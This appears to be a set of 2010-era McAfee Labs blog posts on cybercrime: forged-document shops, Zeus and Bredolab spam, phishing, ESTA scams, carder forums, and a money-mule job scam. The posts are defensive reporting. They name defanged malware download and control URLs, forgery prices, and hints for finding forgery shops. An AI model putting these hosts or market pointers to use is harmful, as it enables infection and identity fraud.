Two weeks ago, I posted a blog entry talking about the counterfeiting of legal documents. I have received many comments and requests for further data from various Eastern Europe countries, France, and even the United States, related to this type of fraud. Aside from journalists, for whom it is their job, many people have contacted or attempted to contact me. Most of them were curious and friendly, but others flooded my mailbox:

The first request was for the URLs of the websites that provide the services. At McAfee, like at most of our competitors, we almost never disclose dangerous URLs apart from researchers in the business and law enforcement agencies. And in many cases we also employ some internal testing to avoid infection or compromise. When I wrote my blog entry, that URL was safe (no malware, no iframe), but this can change, especially if their owners know it will be visited by MANY inquisitive people.

The next question was that of the counterfeiter’s nationality. No doubt they are Russian speakers.

Another request was related to the abundance of these offers. The site I visited actually contained a competitor blacklist with a dozen or so “disreputable” companies. As they were all restricted to driven licenses, I carried on further investigations on the passport field. It was not difficult to find other offers with MORE attractive prices: less than $1000 instead of the 4 or 5 thousands dollar proposed by the first one.

In this last offer, I noted the availability of Diplomatic passports (price on demand).

If you are not a google search ninja, you can just check Youtube. There, various well-phrased searches can direct you to the online shop you are looking for:

And regarding the payment methods?  It seems they all prefer Western Union however they are not very talkative on this subject as you have first to contact them via anonymous mailing services (they specify: “no ICQ, no SMS, no phone call”). However, I discovered another offer, with details about how to place an order.

At last, some people wished to know if these sites offered others materials or services. Some of them do sell carding equipment to read/write magnetic cards however the prices were exorbitant. They quoted between $9000 and $11000 when many of these devices can be found on Amazon or Ebay for $500!! Most interesting, and to prove the relevance of our previous advice regarding what you toss into your household trash, one site offers fake French EDF (national electricity company) and British Telecom utility bills for £10. In Europe, we frequently use these documents to prove our residency or proof-of-address.

Even the envelope is supplied! The least important pieces of paper can interest today’s cybercriminal!

Yesterday we discovered a new Zeus campaign.

Most of the messages associated with the new spam campaign are linked to the Asprox botnet. This time, the focus is on FedEx. Most of the attachments start with either FedExDoc[randomnumbers].exe or FedExInvoice[randomnumbers].exe. Those attachments are recognized as the Bredolab Trojan, which will download the Zeus component.

This Zeus variant has a control host on hxxp://x5vsm5.ru, but also downloads from hxxp://trachsel.biz.

The targets of these samples are a large number of banks outside the United States. We still see common U.S. targets…

• Citibank
• Comerica
• USBank
• WellsFargo

and also some banks from Europe, the Middle East, Asia, and South America…

• Neue Bank (Liechtenstein)
• Arab Bank
• MyBank (Taiwan)
• BHI Bank (United Kingdom)
• NPBS (United Kingdom)
• Banco de Sabadell (Spain)

as well as several other banks.

Watch out for Zeus’ going global.

The Anti-Malware engine is a critical and core piece of the McAfee anti-malware solutions. As with any core technology, the engine must be rock-solid stable, fast, and functionally rich.

A new McAfee Labs whitepaper outlines these engine technologies and values, covering both endpoint and gateway uses. Beyond introductions to malware detection methodologies–ranging from exact detection to heuristics, and technologies from exploit detection to cloud-based detection, the new paper especially outlines McAfee’s approach to Cooperative Anti-Malware on Endpoint and Gateway. “Cooperative” in this case refers to the added value of combining anti-malware on the endpoint and on the gateway: a true defense-in-depth strategy in action.

In this defense-in-depth implementation we have engine technologies that are optimized for the endpoint and the gateway, respectively, and both are connected through our Global Threat Intelligence back-end, or “cloud.” This combination allows strict enforcement and the highest proactive catch rates at the network perimeter, keeping the majority of threats outside of your network, and effectively and accurately protecting the desktops in an enterprise as well.

Download and read it now!

We unceasingly monitor and combat old and emerging web threats, taking different approaches to best protect our customers. Cybercriminals continuously look for new ways to steal valuable information. A recent phishing scam we’ve seen impersonates three popular institutions: PayPal, Bank of America, and free offers to check your credit score.

The recent attack on Bank of America users is arriving as spam email with a phishing link alerting users about an “account deactivation.” The scam claims online banking security regulations require users to click on the provided URL. Don’t fall for this tactic. Clicking the link “RESOLVE” redirects you to a malicious site.

A similar situation occurs with the scam a “security problem” with your PayPal account. The URL redirects victims to a fake page that is visible at the main domain. These malicious pages use the same graphics, style sheets, and links from genuine pages.

Would you trust an unsolicited email that offers to check your credit score for free? It looks authentic, but definitely is not. It’s always much safer to manually type the web address you like to visit instead of clicking a link from a suspicious email. If you receive one of these emails, do not click on the links. Users without protection who click on these links will possibly infect their computers or might reveal their data.

Remember to keep your anti-virus software up to date, and do not provide any personal or financial information to unsolicited email messages. Last year 11.1 million people were victims of identity theft in the United States; an identity is stolen every three seconds. Cybercriminals aggressively pursue unprotected users. Learn how to prevent identity theft at our McAfee Identity Protection page.

Phishing and identity theft involve not only the theft of funds. In addition to financial data, information collected by cybercriminals also can allow them to create and sell false legal documents.

On top of selling malware, renting botnets, or launching denial-of-service attacks, supplying falsified documents is another well-paid online activity. I visited such a business just yesterday.

One popular document for criminals is a passport. The following website offers a large choice classified by countries. The lowest price (US$870) is for Azerbaijan. A French passport cost US$5,530. A customer must send the forgers personal information as well as a signature and a photo, and they take care of the rest.

The site also offers a large collection of credit cards (sold 10 at a time) with balances ranging from US$2,000 to US$15,000. Some Platinum cards are guaranteed up to US$50,000.

After money and passport, a criminal might next need a driver’s license. No problem, they can find those here:

To attract customers, the document providers offer specifics for some countries and states. These examples describe Russia and Michigan in the United States:

To make these documents criminals need not only the financial data they can obtain via the usual phishing strategies; they also need more personal data. To get it, they target online and offline locations where this information is available. To protect yourself, you need to remain aware of what you give away on your social networking platform as well as what you toss into your household trash.

Last year, the U.S. government passed a law making mandatory online registration for travel for all citizens from countries eligible for the Visa Waiver Program. The Visa Waiver Program is available to citizens from the European Union, but also to citizens from other countries such as Switzerland, Japan, South Korea, and Singapore.

The registration has to be made 72 hours prior of traveling into the United States. This registration can be made only through an online form, the Electronic System for Travel Authorization (ESTA), available at the official website of the Department of Homeland Security at https://esta.obp.dhs.gov. This registration is currently free. Once a traveler registers, it remains valid for two years, regardless of the amount of travels into the United States.

As part of the Tourism Promotion Act, from September 8, 2010, onward all visitors using the Visa Waiver Program will be charged US$14 to complete this immigration form. Out of this fee, $10 will be used for international campaigns to promote holiday travels and tourism in the United States, the other $4 is an administration fee.

We weren’t surprised that some people soon figured out how to make money from this, especially as the application and payment by credit card must be made online. We’ve seen similar fraud in relation to green card application scams in the past. McAfee Labs research has shown that both types of fraud are related, and it is likely that the ESTA fee scam is run by the same organizations as the green card scammers.

McAfee has also noticed that most search results for “ESTA,” “ESTA form,” or “ESTA online registration” lead to fraudulent websites, especially if the search terms are run in non-English languages. Even worse: Most sponsored ads are leading to fraudulent websites, too.

Examining these sites, we discovered three common types of fraud. The first type offers a basic service to fill out the form for somebody, but at extra costs ranging from $30-$250. These services are rather harmless, because users probably still get their online registration. The biggest risk here is the loss of personal information to third parties, which may result in spam emails or other types of unrequested contact. In worse cases, providing personal travel dates could end in burglary, as users provide their addresses and the information when their homes will be uninhabited.

More critical than these are sites that are primarily set up to gather personal information. This type of phishing is even worse that the common banking-related phishing: Rather than banking or credit card information, users are required to enter their date of birth, passport IDs, contact address, and other personal information, in addition to the questions that are mandatory for U.S. immigration, such as medical diseases, crime records, or information about espionage activities or war crimes. These sites are even constructed to grab the information of traveling family members as well.

The third type of fraudulent sites related to the ESTA registration offer application guides or forms for download. These download forms are simply malware. It is essential you not download anything from these sites. The ESTA form is a web-based application; no forms need to be downloaded.

What these sites have in common is that they pretend to look like official government websites. Some are even available in other languages such as Japanese, German, or French. One ESTA phishing site we examined is available in 12 languages. These sites simulate authenticity by using common icons or a “safe” governmental link somewhere on the page. Some include a long section with privacy and service-term disclaimers. It is ironic that they warn users to be careful of fraudulent websites stealing your private information or overcharging for the use of their services:

Warning! Applying through a third party website may not comply with ESTA regulations. Beware of fraudulent websites that collect your private information and claim to submit the application on your behalf. Applying for your own Travel Authorization is the only way to be 100% sure that your application was submitted properly. Travelers with an invalid ESTA Travel Authorization will be denied entry by U.S. Customs and Border Protection. Download the Application Guide below and submit your own ESTA application today.

In summary, the online registration is available only at the official site of the Department of Homeland security at https://esta.cbp.dhs.gov. This secure government website gives you all important information; it is even available in all 22 languages of the countries that qualify for the Visa Waiver Program. There is no need to use a third-party service for this immigration form. Every other site offering such a service is scam–charging extra, stealing personal information, or just spreading malware.

On August 7, the French Police National Aux Frontiers arrested Vladislav Anatolievich Horohorin at the Nice airport when he attempted to board a flight to Moscow. This 27-year-old citizen of both Israel and the Ukraine lived, according to rumors, on the French Riviera. At the time of the arrest, the authorities said, he was carrying some casino-issued cards that give high rollers additional privileges. He is now being held in France pending extradition to the United States.

In security circles, Horohorin was known as BadB. He introduced himself as one of the biggest “dump” vendors, selling stolen credit card information since the days of CarderPlanet.

Apart from his association with carder websites such as CarderPlanet or carder.su, BadB managed his own websites. He advertised the availability of stolen credit card information through his web forums, and he directed purchasers to create accounts on his sites. The next screenshot shows one of his websites in 2007.

On AOLNews, and according to the indictment, we can read some details about Horohorin’s activities. On May 15, 2009, a Secret Service agent contacted BadB and purchased credit card dumps. Most of them were subsequently verified by Visa to be authentic. In July 2009, Secret Service agents saw that BadB was selling dumps from a variety of banks around the world. But this time, while communicating via the Internet, BadB said he was no longer accepting funds through Western Union and purchases had to be made through WebMoney. Using this electronic payment system, authorities bought some credit card dumps.

In November 2009, a federal grand jury in Washington indicted Horohorin on charges of access-device fraud and aggravated identity theft. This indictment remained sealed while authorities tried to hunt him down.

Today, the BadB websites are still online.

One of these sites welcomes visitors with a cartoon showing the Russian Prime Minister, Vladimir Putin, awarding gold medals to cybercriminals.

Horohorin faces a maximum penalty of 10 years in prison and a US$250,000 fine on the count of access-device fraud. He has also been charged with one count of aggravated identify theft, which carries a statutory consecutive penalty of two years in prison and a fine of up to US$250,000.

Malware has reached its highest levels, making the first six months of 2010 the most active half-year ever for total malware production. At the same time, spam leveled out, with only 2.5 percent growth from last quarter.

Malware continued to soar in the second quarter, as there were 10 million new pieces cataloged in the first half of this year. Consistent with last quarter, threats on portable storage devices took the lead as the most popular malware, followed by fake anti-virus software and social media malware. With approximately 55,000 new pieces of malware appearing every day, globally AutoRun malware and password-stealing Trojans round out the Top 2 malware threats.

“Our latest threat report depicts that malware has been on a steady incline in the first half of 2010,” said Mike Gallagher, senior vice president and chief technology officer of Global Threat Intelligence for McAfee. “It’s also obvious that cybercriminals are becoming more in tune with what the general public is passionate about from a technology perspective and using it to lure unsuspecting victims. These findings indicate that not only should cybercrime education be more widespread, but that security organizations should move from a reactive to a predictive security strategy.”

After reaching its highest point in the third quarter last year, with nearly 175 billion messages per day, spam rates have hit a plateau. Cybercriminals took advantage of the hype surrounding the FIFA World Cup in South Africa, and used various methods to promote scams and search-engine “poisoning.” Globally, the most popular types of spam varied from country to country with some interesting findings. For instance, delivery status notifications, or nondelivery-receipt spam, were the most popular in United States, Italy, Spain, China, Great Britain, Brazil, Germany, and Australia. Malware spam, or anything that comes with a virus or Trojan attachment urging you to visit an infected website, was the most popular in Colombia, India, South Korea, Russia, and Vietnam. Argentina had the most variety in spam, with 16 topic areas, ranging from drugs to “lonely women” to diplomas. Italy came in with the least variety, with just six types of widely popular spam.

Attackers leveraged major events such as the World Cup and Middle East conflicts to poison Internet searches, although the BP oil spill in the Gulf of Mexico was surprisingly absent from the Top 20 toxic search terms. McAfee Labs also saw a resurrection of two “dead” botnets: Storm Worm and Kraken, once considered to be among the biggest botnets on the planet, are again on the rise.

For a full copy of the McAfee Threats Report, Second Quarter in nine languages, please visit: http://www.mcafee.com/us/threat_center/white_paper.html

Like many iPhone users, I “jailbreak” my iPhone. I do this for many reasons, but mainly for console-level access and the darn cool infosec tools that are available through Cydia. Like many iPhone users, I was quite happy when the Electronic Frontier Foundation (EFF) was able to get jailbreaking included under “fair use” within the Digital Millennium Copyright Act. Like many iPhone users, I was also very happy to learn that Dev-Team would soon make remote jailbreaking possible by simply visiting their jailbreakme website. Alas my happiness was not to last.

While still at Defcon, I saw through Twitter that one exploit or another was being used to remotely jailbreak the iPhone. (I believe the first tweets I saw were from Brian Krebs.) I then saw posts from VUPEN that several flaws were being exploited. From their advisory:

Technical Description

http://www.vupen.com/english/advisories/2010/1992

Did you notice the line “VUPEN is not aware of any vendor-supplied patch”? In the security business we call those zero-day vulnerabilities. We call code that takes advantage of zero-day vulnerabilities zero-day exploits. (I have not seen confirmation from Apple that these are in fact zero-day vulnerabilities, so keep that in mind).

I hope I am not the only one who is bothered by this because it begs the question “What else can this be used for?” Vulnerabilities with reliable exploit code tend to get reused and repurposed for other attacks/malware/uses. Just look at the .LNK vulnerability that Microsoft fixed yesterday via an out-of-band patch. It originally targeted power-plant control systems as the Stuxnet worm and then appeared in more mainstream malware because it was an unpatched vulnerability with working exploit code. Read this article in The Register for a real nice breakdown of it.

This should serve as a wake-up call for anyone with a mobile device: Remote exploitation is real and here to stay. For now these vulnerabilities are being used only (as far as we know) to jailbreak iPhones, but they could be used to do many other things to iPhones and their owners around the world.

First of all, this is not a sales pitch.

McAfee offers several of its products for a trial period. However, we want you to know that we have just found a brand new variant of the Bredolab Trojan that is spreading by email with the following characteristics:

Subject: “McAfee VirusScan Plus”
Message body: “Download a FREE 30-day Trial of MCAfee VirusScan Plus and Be Automaticaly Entered to Win.
Installation file attached”

If you are suspicious of misspellings in emails, you might have noticed that both “MCAfee” and “Automaticaly” are not correct. Another point is the attachment–we don’t send setup files for our products as email attachments! As you may have guessed by this point, the attachment is the Bredolab Trojan.

If you do want our trial version, you can find it here: http://www.mcafee.com/us/downloads/index.html

McAfee Labs researchers have seen a noticeable spike in URLs leading to Koobface malware. (Koobface is an anagram of Facebook.) The latest, unexpected Koobface campaign spreads by tricking Facebook users into downloading and running links with the following characteristic:

URL format: <Domain/variable/setup.exe>

All of these have been found in the same MD5: 9cac65b88d2288fb16f8a356c3563604.

Koobface malware, since its first appearance in 2008, has continued to arise intermittently with multiple variants that speed through the popular social networking site. The malicious code can hide in video clips, and most users are prompted to install a new version of Adobe Flash player; but the upgrade is actually a copy of the Koobface worm. Koobface also attempts to download itself using a mixture of files and extensions such as Domain/variable/Flash__Player.exe or Domain/view/console=yes/setup.exe.

Koobface sends false messages and comments to the victim’s friends, redirects them to a malicious website, and tries to steal log-in credentials to spread itself. In some cases after the worm downloads and local files are modified, victims cannot run most programs. Watch this space for more information and further details of Koobface hijacking in a blog by my colleague Craig Schmugar. [Update: You'll find that blog here.]

Don’t open messages or click on links from sources that you do not trust. Here’s an example of how McAfee SiteAdvisor technology and the McAfee TrustedSource™ reputation system protect users and make their browsing safer.

Social networking sites and technologies are among the hottest happenings on the Internet. However, in this case every benefit comes with an equal danger: These sites and technologies are also huge targets for cybercriminals. One of McAfee Labs senior researchers, Anthony Bettini, has written an excellent whitepaper on the subject. Social Networking Apps Pose Surprising Security Challenges details some of these areas of concern. I’ll let Tony tell the story:

Facebook, Twitter, MySpace, and LinkedIn—oh my! If we’re not using these services ourselves or hearing about them in the media, our friends, colleagues, and children remind us each day of their existence. Although Web 2.0 may be a buzzword we all love to hate, media-rich web applications that allow information sharing among users are here to stay and growing in popularity. An article written in October 2009 (so it’s clearly out of date) on the size of Facebook’s data center states Facebook stores approximately 80 billion photos and serves up approximately 600,000 photos per second—making it the largest photo archive in the world.1 Social networking web applications such as Facebook are a big deal.

As social networking gains users, it will increasingly be targeted by attackers, just as instant messaging and other media have been. For an interesting view on how platform prevalence draws attackers like bees to pollen, see the IEEE article “When Malware Attacks (Anything but Windows).” One popular technology ripe for exploitation in social network applications is the “mashup.” (Wikipedia: “A mashup is a web page or application that uses or combines data or functionality from two or many more external sources to create a new service.”) From the perspective of an application provider such as Google, mashups allow their applications—for example, Google Maps—to become more widely used and embedded within other new applications, like Yelp or the iPhone operating system. However, as we’ll soon see, attackers have also been using mashups to their advantage.

Download and share this excellent paper with all the people you know who use social networking sites and technologies. The dangers are real–but with education, action, and proper security we can successfully manage them.

We just noticed a new wave of fake resume spam that redirects users to a malicious site. We see the resume pages were uploaded to innocent sites in top-level domains of various countries, perhaps in an attempt to internationalize the spam campaign.

The pages contain a small piece of obfuscated JavaScript code that translates into a malicious URL when decoded.

This malicious domain is also related to other domains that were used in a fake YouTube malware campaign and a Zeus control server. So keep this in mind next time you click on that $100k job offer or suspicious job application from an anonymous sender. McAfee SiteAdvisor technology can help protect users from these kinds of threats.

It has been a little while since we heard something new from the pharmacy spam corner, but right on time at the end of Q2, they are back–and with reinforcements!

Our researchers have found an enormous number of spam URLs, and they are all related to some well-known malicious IPs ranges–194.xx.xx.x2 and 194.xx.xx.x4.

The first IP range alone could give us a repertoire of almost 200 alike-sounding URLs with words such as erect, drugs, med, pharm, or pill. And, of course, they appear in various combinations with several number-letter extensions, for example, hxxp://33a2.xxxxxxxxxxxx71a.xx. or hxxp://drugsxxyyzz.xx.

Although these IPs contain the “Canadian pharmacy” spam terminology, their TLDs are mostly from Russia and Ukraine.

The start pages all appear in the familiar design of the previously mentioned “Canadian Pharmacy Group,” but this time with different persons smiling at us.

Even though these sites have gotten a design refresh, they are made with the same fraud patterns and goals of all pharmacy spam. Keep in mind that there are hundreds (or more) of new URLs on a daily basis. So if you get to one of these sites, you should handle it with great caution. Look out for any evidence of Canadian pharmacy association in combination with a foreign country TLD on these pages. If you find some, get away from them as fast as possible! Don’t get trapped or lured into one of their offers or you may need more than pills for your headache, data theft, or potential identity theft soon enough.

Carder.cc is a German online forum dedicated to helping criminals in trading stolen credit card and login details obtained via their carding or phishing activities. Because such forums are a source of income for their administrators (who are also involved in this black market), the best-known forums are forever engaged in underground infighting to stay atop the heap. If a competitor can demonstrate that another forum is insecure, the former can win market share.

This is the likely cause that some individuals hacked the carder.cc forum and posted on a public file-sharing network the results–including information about thousands of forum members and, in many cases, their passwords.

Perhaps the most interesting exposed file is a RAR that contains a dump of the forum and a tool allowing the curious to reconstitute site for browsing with administrator rights.

First of all, we find data about the four administrators, their emails, and when they joined the group:

Following the link, we see the IP for each member (a real or fake IP, depending on the use of an anonymizer) and the function title (KRON0S is the “God of Carders”; Zagerus is “Techadmin”).

Besides the four administrators, by browsing the member list we find:

• 4121 simple members
• 5 global moderators
• 258 second-level members
• 7 third-level members
• 4 moderators
• 17 verified vendors
• 497 banned members

Age, nationality, and other personal data are sometimes mentioned. Websites, ICQ, AOL Messenger, Yahoo Messenger, and MSN contacts are also noted. No doubt these data will interest law enforcement agencies in their inquiries.

Most of the offers available in the various forum areas are linked to standard carding and botnet businesses. However, some of them were less common: I noted a Secondlife account with 65000 Lidendollars (about US$60), some $50 iTunes gift cards ($20 each), and a forged papers factory (about $1,000 for each falsified document).

Visiting this forum shows the identity theft market is plenty healthy. The number of free payment accounts that include the full identity of each victim–offered here to attract customer interest–gives us the proof. I made a search for French victims. The next screenshot gives only a brief outline.

Spam never ceases to amaze me. The latest phishing scam I’ve seen is spammers impersonating CartaSi, the Italian financial institution. The message subject is “Effettuare l’aggiornamento dei dati,” which means to proceed with the data or information update. This email even carries an introduction that educates users about phishing on the web. The scammers provide a fake secure link informing CartaSi users how they can avoid online banking problems.

The e-mail scam starts here:

Once victims click “Accedi a collegamento sicuro,” they are redirected to an IP in the form of 96.X.XX.X0 that loads the phishing-page clone of the genuine cartasi.it page. Some of the Italian form and grammar are incorrect, so Italian readers should immediately be suspicious.

Users without protection who click on any of these links could infect their systems, resulting in stolen personal or financial credentials. Regardless of what language you speak or where you do your browsing, make sure you are safe.

Here is an example of how McAfee technology protects users from malicious phishing attacks.

Malware authors have long taken advantage of high-profile incidents and trends to infect naive Internet users with malware. Historically, we have come across innumerable incidents like Michael Jackson’s demise or the Benazir Bhutto assassination as an avenue to spread malware.

We have seen instances from recent times where FIFA World Cup themes have been extensively used as bait to lure unsuspecting users into opening malicious attachments. With lots of recently discovered vulnerabilities and widespread distribution, PDF files are a perfect vector for these kind of attacks. These threats can be delivered as emails or poisoned search-engine results leading to malicious PDFs.

This particular PDF file is directed at certain high-profile targets. Upon executing the malicious PDF file on a vulnerable version of Adobe Reader or Acrobat, it drops an innocent PDF file as shown in the figure below to spoof the unsuspecting user.

This PDF exploits a vulnerability in the way Adobe Acrobat and Reader handle TIFF files and affects all Versions 9.3 and earlier.

This malicious PDF drops and executes a malicious payload detected as BackDoor-ERZ, while the malicious PDF is detected as Exploit-pdf.b with McAfee’s 6022 DATs.

Today we announced our McAfee® Family Protection iPhone®, iPod touch® and iPad™ Edition. McAfee now provides strong parental controls to keep young people safe when they are browsing the Internet on an Apple mobile device. McAfee released McAfee Family Protection for the PC in June 2009.

According to data released by Admob in 2010, 65 percent of iPod touch users and 13 percent of iPhone users are below the age of 17. According to The Internet Safety Technical Taskforce in a December 2008 survey, twice as many kids own an Internet-enabled mobile device versus a computer.

McAfee® Family Protection iPhone, iPod touch and iPad Edition offers website and search filtering. The program will automatically block age-inappropriate sites, such as known pornography web sites, as well as filter Google search results. It also includes location tracking for Apple devices that are equipped with GPS technology.

Parents can also view usage statistics, including visited websites and access times, as well as add and remove custom websites while having the option to remotely disable all Web browsing.

From McAfee Chief CyberSecurity Mom, and my pal, Tracy Mooney:

“Many parents don’t consider online dangers when providing their kids with an iPod touch or passing on their old iPhones to them. Even if they are trying to monitor on a regular basis, it’s nearly impossible to know what they’re searching for,” said Mooney. “I’ve tried to be vigilant about checking in from time to time to see what my kids are doing online, but I know that my kids have more access now than ever with their mobile device. This product will help parents be at ease when they are equipping their kids with the latest technology.”

McAfee Family Protection iPhone, iPod touch, and iPad Edition is available for download now at the iTunes App Store and McAfee.com. For more information about McAfee mobile please visit the McAfee Mobile site.

Today McAfee released the results from our survey “Secret Life of Teens,” which provides a detailed snapshot of online teen behavior. It reveals that 85 percent of teens go online somewhere other than at home and under the supervision of their parents, nearly a third (32 percent) of teens say they don’t tell their parents what they do while they are online, and 28 percent engage with strangers online. The survey results should serve as a wake-up call for many parents.

Kids today are using mobile devices more than ever to get connected, which means increased opportunities for unsupervised usage. Is this a bad thing? Not necessarily, but it can become one easily. I truly believe it comes down to values. It is not that young people today do not value privacy or security but rather that they value openness much more. To protect young people, we need education and technology, both of which are firmly in the hands of us parents. Kids cannot teach themselves to be safe online.

We commissioned Harris Interactive to conduct the survey and in it we detail some pretty startling facts:

69 percent of teens divulged their physical location
28 percent chatted with strangers

Of those teens who chatted with strangers, defined as people whom they did not know in the offline world:

43 percent shared their first name
24 percent shared their email address
18 percent posted photos of themselves
12 percent posted their cell phone number

As the parent of a teenage girl, I found the results eye-opening that girls make themselves targets more often than boys: 32% of the girl respondents indicated they chat with strangers online vs. 24% of boy respondents. Byron Acohido of The Last Watchdog, has a great write-up of the report as well.

Times and technology have changed. It is very easy to be a cybercriminal and predator. Download and read this survey (I linked the copy on The Last Watchdog website). Share it with everyone you know who has children. Read it with your own children. Teachable moments are a great thing. This is a teachable moment.

Take back the Internet.

We have discussed previously that malware writers and cybercriminals read the same news that the rest of us do. They use the same tools as we do and go to the same sites we go to as well. Over the last several years we have seen cybercriminals and malware writers consistently use high-impact news events as the social lure in spams, scams, and malicious websites. Recently they have begun to set their sites on the popular social networking service Twitter; this should come as no surprise because more than 75 million people globally use the service.

The recent happenings in the Middle East simply presented cybercriminals with too good of a lure to pass by: the Gaza Flotilla. It is all over the news as a quick Google Search shows.

So we did a little quick searching to see what we could find–starting with a great tool called BackTweets:

BackTweets is great; it lets you search Twitter for keywords and links. These very simple and quick searches gave some interesting results. Using just the words Arabs, Israel, and exe (so we could easily connect the main words to an executable program in a tweet), we got the following results, in no particular order:

As well as:

You might notice in the second search that there was also a bit of celebrity abuse (a common device) using some of the same tags. Both of the account profiles referenced were seemingly created just to distribute these:

and:

Looks suspicious! Especially when you check the low follower and following counts–and the files themselves linked to malware that at the time of this writing had very little detection:

With the explosion in popularity of social media and networking technologies such as Twitter we can expect to see this type of abuse skyrocket in the coming months. As more and more users take advantage of social networking platforms to get news (or other information), so will the malware writers and cybercriminals.

In a recent spam–that appeared to be a page from a popular Brazilian newspaper–we read that the Brazilian soccer team coach Dunga had been involved in an assault. He was apparently punched in the face by two angry fans who were unhappy that he had not selected two players–Neymar and Ganso–in his 23-man roster for the FIFA World Cup in South Africa this month.

Besides offering a very poorly modified picture of the coach, this scam also contained a link to pictures of the fight. (“Clique aqui e veja as fotos.”)

The link, in fact, leads to another website:

hxxp://ml210-202-198-66.vdslpro.static.apol.com.tw/[REMOVED]/index.asp?

This link redirects to another website, which belongs to the Malaysian government (according the domain .GOV.MY ) and which appears to be hacked:

hxxp://kew.mida.gov.my/[REMOVED]agressao_dunga.exe

This file, which claims to contain photos related to the fight, is really a Trojan that we call PWS-Banker.gen.ad, which specializes in capturing banking credentials.

With the World Cup only nine days away, I bet we will see many more of these scams.

Oh, and I’ll also bet that Brazil will win again.

The news that Google is supposedly dropping Microsoft Windows is spreading like wildfire all over the Internet today. Without getting into any “which OS is better or more secure” holy war, let’s review some facts to see if this “decision” has any basis in reality. (I caution readers to remember this is not confirmed, even if it is true.)

The supposed cause of this change is Operation Aurora, the attack that affected Google and many other companies. From the McAfee Labs Threat Center:

“Operation Aurora was a coordinated attack which included a piece of computer code that exploits the Microsoft Internet Explorer vulnerability to gain access to computer systems. This exploit is then extended to download and activate malware within the systems. The attack, which was initiated surreptitiously when targeted users accessed a malicious web page (likely because they believed it to be reputable), ultimately connected those computer systems to a remote server. That connection was used to steal company intellectual property and, according to Google, additionally gain access to user accounts.”

What many people fail to realize is that Operation Aurora was not really about any technical issues.

But you may ask “Marcus, how can you possibly say that? Have you gone mad? Aurora 0wned multiple computers on multiple networks! They were all running that evil Microsoft Windows. Surely removing Windows will solve all the problems!”

These objections are not even close to the real issue. Sure, the attackers used a very effective zero-day vulnerability. And, certainly, they used lots of evasion techniques in delivering the payload? But the real vulnerability has not been discussed.

People were the weak link.

The attackers who launched Operation Aurora knew their targets well from both corporate and personal viewpoints. They knew what their victims were running and what their roles were. The attackers even knew what application versions they used. (Ever wonder why the zero-day was limited in effectiveness to Internet Explorer Version 6 when the attack commenced? The attackers knew that was all they needed.)

The intel that the attackers gathered to make Operation Aurora work is what made it a success–not the operating system involved. The targets were the people.

Would it make any difference if the victims were running Linux or any other operating system if an attacker builds such a sophisticated profile? Not remotely. Linux, Windows, Mac, whatever–everything has weaknesses. Especially the users of those systems.

When an attacker knows the details of a company’s technical deployment and personnel to the level we saw in Operation Aurora, the difference between one operating system and another is irrelevant. Any system or network can be technically compromised. Likewise, malware can be written for any operating system.

If determined attackers and gatherers of intelligence invest the time to get to know their targets–their behaviors, likes, dislikes, technical backgrounds, job roles, etc.–the actual exploit is trivial. All they have to do is get their victims to click a link. The more they know about their targets, the more likely users will click it.

Social engineering and intelligence gathering trumps technology every time. It always has and always will.

Lately Facebook has been all over the news regarding security and privacy issues. Today Facebook replied, by announcing some new tools, settings, and measures to allow users to better protect their logons. In his blog, Facebook’s Lev Popov describes the new settings and features in nice detail.

In a nutshell, users now have the ability to be notified of a logon from a variety of devices. From his post:

Login Notifications

Over the last few weeks, we’ve been testing a new feature that allows you to approve the devices you commonly use to log in and then to be notified whenever your account is accessed from a device you haven’t approved. This feature is now available to everyone.

To try it out, go to the Account Settings page and click on the link next to “Account Security” at the bottom of the page. If you select the option to receive notifications for logins from new devices, when you log in you’ll be asked to name and save the various devices you use to access Facebook.

The feature itself is easy to enable: From Account Settings > Account Security you will see the following screen:

I like that users can name and save various “devices” they use to access Facebook. If someone logs into that account from a device not on this list, Facebook will prompt that user for further information. Handy!

Facebook has also done some tuning/magic on their side to block bogus or questionable logon attempts. If they see logons from unusual devices, they will prompt those users with additional verification questions, in essence, making them prove they are who they say they are:

I think these are great steps, and I am glad to see Facebook stepping it up in regards to securing account access. When you consider the high prevalence of password-stealing Trojans and Koobface (malware that targets Facebook users) these measures are certainly a move in the right direction.

More general information on what Facebook does for security can be found on their Security Page.

I was just reading Byron Acohido’s writeup on Microsoft ending security support for patches for Windows XP Service Pack 2 and Windows 2000. Now as I work for a vendor myself I completely understand why Microsoft is going EOL (or is it EOS for end-of-support?? I forget…) for these operating systems – better, more robust OS choices exist and no company has unlimited resources to support application and technologies that have seen better days.

I get that, I really do. I do, however, think some larger issues certainly loom:

1. Legacy applications that will not run on higher patch builds
2. Point-of-Sale and embedded devices (think ATM’s an such….) ESPECIALLY if you have a global deployment
3. Patching and upgrading is never easy anyway
4. The agility of cybercriminals

Now I will also concede that its relatively straightforward to compromise a fully patched system. The tools and techniques are readily and easily available if you have a browser and even limited Google search skills – but let’s also be honest: its WAY easier to own an older unpatched build especially when all the vulnerabilities that XP Service Pack 2 and Windows 2000 have are so well documented and available. Malware also tends to be fairly backwards compatible in many cases.

I am not so certain this will cause a great shift in toolkits or focus of your average malware writer or cybercriminal. I DO think it is an excellent opportunity for scammers tho. Just think of the spam campaigns or link spam possibilities – its a great lure.

“MS has stopped support for XP Service Pack 2 click here for low cost upgrades!!!”
“Your machine seems to be running Windows 2000. Click here to upgrade to Windows 7 for a low price.!”

I can see the spam runs, phishing sites and associated fake-av installs now… Be forewarned my friends. And is it just me or is whitelisting and application control looking better and better??

We have written several times about Internet scams. Some of the most famous scams are certainly the “Nigerian” ones, where you were supposedly the one that would receive about 1M USD to facilitate a transaction. It was even covered on Dateline! Other popular scams include work-from-home scams and romance scams.

So, I decided to get enter into one of these work-from-home scams so I could post it here and hopefully help others at the same time. The scam itself will be separated into Days for better clarification.

Day 1: The Job Proposal

I got in my personal mailbox a spam that is quite common, at least since mid-2009.

Some excerpts:

You could work on Part-Time basis for SINOCHEM Corporation as a FINANCE CO-ORDINATOR in the United States/Canada or its environs which requires a great deal of trust and honesty. Meanwhile, this job is 100% tax free and there is no start up cost required. I am Mr. CHEN Guogang (Chief Financial Officer, Sinochem Corporations).
JOB DESCRIPTION:
1. Receive payment from Clients.
2. Cash Payments at your Bank.
3. Deduct 10% which will be your percentage/pay on Payment processed.
4. Forward balance after deduction of percentage and pay to any of the offices you will be instructed to do so later
(Payment is to be forwarded by WESTERN UNION Money Transfer).

10% from each transaction! For instance: you receive 5000 USD via checks on our Behalf. You will cash the Check and keep $500 (10% of $5000) for yourself! Anyway, your commission is a constant percentage which will be subjected to an increase of 15% and above based on your efficiency in services being rendered to the company.
